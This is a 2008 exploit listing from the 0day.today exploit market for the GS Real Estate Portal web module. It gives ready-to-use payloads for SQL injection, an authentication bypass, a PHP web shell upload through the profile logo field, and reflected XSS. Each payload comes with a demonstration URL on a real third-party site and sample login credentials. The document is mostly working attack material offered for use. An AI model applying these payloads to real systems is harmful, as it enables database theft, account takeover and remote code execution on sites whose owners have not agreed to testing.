[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

GS Real Estate Portal US/International Module Multiple Vulnerabilities

Author
ZoRLu
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4175
Category
web applications
Date add
14-11-2008
Platform
unsorted
======================================================================
GS Real Estate Portal US/International Module Multiple Vulnerabilities
======================================================================


[~] GS Real Estate Portal US and International Module
[~]
[~] SQL/BYPASS/RFU/XSS
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 13.11.2008
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] my bug number now: 39
[~]
[~] my target bug number: 100
[~]
[~] -----------------------------------------------------------


Exploit 1: sql inj

http://localhost/script/email.php?AgentID=[SQL]


[SQL]

-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin--


sql for demo:

http://hostnomi.net/int/email.php?AgentID=-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin--



Exploit 2: auth bypass

login: http://localhost/script/login.php

username: [real_admin_or_user_name] ' or ' 1=1--

password: ZoRLu

note: generally admin name: admin 


bypass for demo:

login: http://hostnomi.net/int/login.php

admin: admin ' or ' 1=1--

passwd: ZoRLu


exploit 3: Rfu

you login to site and edit your profile upload your_shell.php

after right click to your logo and select properties. copy photo link. 

paste your explorer go your_shell.php


your_shell.php path:

http://localhost/script/re_images/[id]_logo_your_shell.php


rfu for demo:

user: zorlu

passwd: zorlu1 

edit profile: http://hostnomi.net/int/profile.php

shell: http://hostnomi.net/int/re_images/1226591775_logo_c.php ( no permission this demo server )



exploit 4: XSS

http://localhost/script/email.php?AgentID=&ListingID="><script>alert()</script>

xss for demo:

http://hostnomi.net/int/email.php?AgentID=&ListingID="><script>alert()</script>


[~]----------------------------------------------------------------------




#  0day.today [2024-12-24]  #